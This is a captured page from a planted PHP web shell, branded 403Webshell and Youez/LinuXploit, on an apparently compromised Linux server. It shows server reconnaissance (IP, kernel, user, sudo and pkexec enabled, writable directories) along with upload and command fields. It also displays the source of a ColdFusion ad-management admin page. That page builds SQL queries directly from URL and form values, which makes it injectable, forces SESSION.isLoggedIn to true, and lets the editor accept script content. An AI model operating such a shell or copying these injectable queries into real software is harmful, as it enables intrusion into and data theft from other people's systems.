403Webshell
Server IP : 172.67.201.108  /  Your IP : 216.73.216.11
Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5
System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/home2/cgny/nympadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/home2/cgny/nympadmin/adslistypesedit.cfm

<cfinclude template="header.cfm">


 <div class="container-fluid" style="margin-left:200px;">
<div id="content">
  <div id="content-header">
     <h2>&nbsp;Manage Advertising Types   
</h1>
  </div>
  
<cfif parameterexists(Session.email) and (Session.email IS NOT -1)>

<Cfif parameterexists(url.delete)>
    
    <Cfquery name="del" datasource="cityguide">
        delete from adopstrackingtypes where id = #url.delete#
    </Cfquery>
    <cflocation url="adslistypes.cfm" addtoken="no">

</cfif>    
<cfif parameterexists(url.edit)>

<CFQUERY datasource="cityguide">
	UPDATE adopstrackingtypes SET 
	typer = '#form.typer#',
	formtouse = '#form.formtouse#',
	instructions = '#form.instructions#'
	WHERE  id = #form.id#
	</CFQUERY>
	
    <cflocation url="adslistypes.cfm" addtoken="no">

    </cfif>
    
   
   &nbsp;<Cfoutput><A href="adslistypesedit.cfm?delete=#url.id#" onclick="return confirm('Are you sure?');">Delete</A></Cfoutput> 
<p>
<cfquery name="getsites" datasource="cityguide">
select *
from adopstrackingtypes
where id = #url.id#
</cfquery>



<FORM action="adslistypesedit.cfm?edit=on" method="post"  enctype="multipart/form-data">
<cfoutput query="Getsites">
<input name="id" type="hidden" value="#getsites.id#" />
  <br>
   <table cellspacing=5 cellpadding=5 border=0 width="95%">
  <tr><td style="padding:4px;">
	  <b><font SIZE="-1" FACE="verdana">Name:</font></b>
  </td><td style="padding:4px;">
	  <input NAME="typer" SIZE="40" value="#getsites.typer#">
  </td></tr>


  <tr><td style="padding:4px;">
	  <b><font SIZE="-1" FACE="verdana">Form to Use:  (can be an external link, or a pre-built form type)</font></b>
	  
	  <cfquery name="gettypes" datasource="cityguide">
	      select distinct formtouse from adopstrackingtypes where formtouse not like '%http%'
	  </cfquery>
  </td><td style="padding:4px;">
	  <input NAME="formtouse" SIZE="40" value="#getsites.formtouse#" placeholder="<Cfloop from='1' to='#gettypes.recordcount#' index='i'>#gettypes.formtouse[i]#<Cfif #i# is not #gettypes.recordcount#>,</cfif> </cfloop>">
  </td></tr>
	  <tr><td colspan="2" style="padding:4px;">

	  <b><font SIZE="-1" FACE="verdana">Instructions: 
	 </b></font> 
	  <br>
<cfapplication sessionmanagement="yes">
<Cfset SESSION.urlid =0>
<cfset SESSION.isLoggedIn = True>

<style type="text/css">
.imageleft{float:left;margin:0 10px 0 10px;}.imageright{float:right;margin:0 10px 0 10px;}
</style>



<Cfset url.id = 0>
   <cfcookie name = "folderme"
    value = "#Now()#"
    expires = "NOW">

	<cfcookie name = "folderme" value = "/upload11/#url.id#/">


<Cfparam name="url.beta" default="on">




<Cfparam name="url.beta" default="on">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>


	<script src="ckeditor46z27e/ckeditor.js" charset="utf-8"></script>

<script type="text/javascript" src="ckfinder34/ckfinder.js" charset="utf-8"></script>

<textarea id="myarea12" class="ckeditor" name="instructions" style="height:600px;"><Cfif parameterexists(instructions)><cfoutput>#htmlEditFormat(instructions)#</cfoutput></Cfif></textarea>


   <cfcookie name = "folderme"
    value = "#Now()#"
    expires = "NOW">

<cfcookie name = "folderme" value = "/uploads2/#url.id#/">
<script type="text/javascript">

CKEDITOR.on( 'dialogDefinition', function( ev ) {
                                // Take the dialog name and its definition from the event data.
                                var dialogName = ev.data.name;
                                var dialogDefinition = ev.data.definition;
                                // Check if the definition is from the dialog we're interested on (the "Link" dialog).
                                if ( dialogName == 'link' ){
                                        var targetTab = dialogDefinition.getContents( 'target' );
                                        var targetDropdown = targetTab.get( 'linkTargetType' );
                                        targetDropdown.default = '_blank';
                                }
                        }       );



CKFinder.setupCKEditor( editor, 'ckfinder34/' ) ;


var editor = CKEDITOR.replace( 'myarea12',{
   height: '500px',
   extraAllowedContent : 'object(*);param(*);embed(*);p(*);script(*);form(*);input(*);div(*);blockquote(*)'
});


editor.on( 'instanceReady', function() {
console.log( editor.filter.allowedContent );
} );
</script>


 </td></tr>
	</cfoutput>
 </table><br>
<input type="submit" Value="Update"  class="btn btn-danger btn-large" style="font:bold 18px;color:white"></center>
</form>
</td></tr></table>


</cfif>

   </div>
<!--Footer-part-->
<br><br><br><br>

<cfinclude template="footer.cfm">






Youez - 2016 - github.com/yon3zu
LinuXploit